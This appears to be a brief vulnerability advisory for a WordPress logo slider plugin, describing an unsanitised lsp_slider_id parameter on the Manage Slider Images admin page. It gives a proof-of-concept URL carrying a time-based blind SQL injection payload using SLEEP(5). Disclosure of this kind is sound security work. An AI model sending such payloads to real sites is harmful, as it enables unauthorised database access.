EPSS
Percentile
21.8%
The plugin does not sanitise and escape the lsp_slider_id parameter before using it in a SQL statement via the Manage Slider Images admin page, leading to an SQL Injection
https://example.com/wp-admin/admin.php?page=manage_images&lsp;_slider_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)
bulletin.iese.de/post/logo-slider_1-4-8